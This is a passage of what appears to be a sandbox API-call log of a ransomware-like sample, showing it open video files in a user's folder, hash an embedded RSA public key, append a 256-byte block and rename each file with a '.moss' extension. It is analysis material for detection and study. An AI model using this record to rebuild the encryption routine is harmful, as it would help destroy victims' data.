lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.032] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=55590) returned 1 [0172.032] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.035] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd900, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.035] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.036] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.036] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.036] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0172.036] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xd926, lpOverlapped=0x0) returned 1 [0172.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.036] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0172.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.036] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0172.037] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.037] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.037] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.037] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0172.037] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.037] GetLastError () returned 0x0 [0172.038] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.038] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0172.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.038] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.038] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.038] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0172.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xd930) returned 0x3b62d40 [0172.038] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0172.038] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0172.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0172.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0172.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0172.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0172.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b512c8 [0172.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e148 [0172.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b51310 [0172.038] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e160 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e190 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e1a8 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0172.039] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e190 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e1a8 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x3b4e1a8 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x3b4e190 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3aa27b8 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0172.039] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa27b8 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e1a8 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4e190 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4ddb8 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0172.039] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0172.040] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0172.040] GetCurrentThreadId () returned 0x324 [0172.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0172.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b500d8 [0172.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0172.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2e9d0 [0172.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0172.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0172.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0172.040] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.041] GetCurrentThreadId () returned 0x324 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0172.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0172.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0172.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4ddb8 [0172.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x3b4e190 [0172.041] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0172.041] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2e0 [0172.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0172.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0172.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0172.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0172.042] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0172.042] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd926, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.042] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.042] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0172.043] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\-2WcrB3nB4LDZ.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\-2wcrb3nb4ldz.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\-2WcrB3nB4LDZ.avi.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\-2wcrb3nb4ldz.avi.moss")) returned 1 [0172.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.043] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.043] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.045] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.045] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9faa8d0, ftCreationTime.dwHighDateTime=0x1d5df1c, ftLastAccessTime.dwLowDateTime=0xd27698f0, ftLastAccessTime.dwHighDateTime=0x1d5dd69, ftLastWriteTime.dwLowDateTime=0xd27698f0, ftLastWriteTime.dwHighDateTime=0x1d5dd69, nFileSizeHigh=0x0, nFileSizeLow=0xcfc4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G2r-lFePN.avi", cAlternateFileName="G2R-LF~1.AVI")) returned 1 [0172.045] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\G2r-lFePN.avi") returned=".avi" [0172.045] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\G2r-lFePN.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\g2r-lfepn.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.045] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=53188) returned 1 [0172.045] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.048] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xcf9e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.048] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.049] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xcfc4, lpOverlapped=0x0) returned 1 [0172.050] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.050] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0172.051] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.051] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0172.051] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0172.051] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0172.051] GetLastError () returned 0x0 [0172.051] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0172.051] CryptReleaseContext (hProv=0xd2e9d0, dwFlags=0x0) returned 1 [0172.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0172.051] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0172.051] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0172.051] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0172.051] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.051] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0172.052] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xcfc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.052] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0172.052] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0172.052] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\G2r-lFePN.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\g2r-lfepn.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\G2r-lFePN.avi.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\g2r-lfepn.avi.moss")) returned 1 [0172.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0172.053] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0172.053] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.054] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3609e18 | out: hHeap=0xcd0000) returned 1 [0172.054] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbb15ed50, ftCreationTime.dwHighDateTime=0x1d5df03, ftLastAccessTime.dwLowDateTime=0x339cfac0, ftLastAccessTime.dwHighDateTime=0x1d5d865, ftLastWriteTime.dwLowDateTime=0x339cfac0, ftLastWriteTime.dwHighDateTime=0x1d5d865, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="O8XDzJfnVQ", cAlternateFileName="O8XDZJ~1")) returned 1 [0172.054] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\WPBWEhNjk04EMrHCp.mp4") returned=".mp4" [0172.054] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\gOI6FhRK7 r-pcVYvKd\\WPBWEhNjk04EMrHCp.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\goi6fhrk7 r-pcvyvkd\\wpbwehnjk04emrhcp.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0172.055] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=84481) returned 1 [0172.055] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0172.058] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x149db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.058] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0172.058] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x14a01, lpOverlapped=0x0) returned 1 [0172.059] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0172.059] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2e9d0) returned 1 [0172.060] CryptCreateHash (in: hProv=0xd2e9d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0172.060] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, 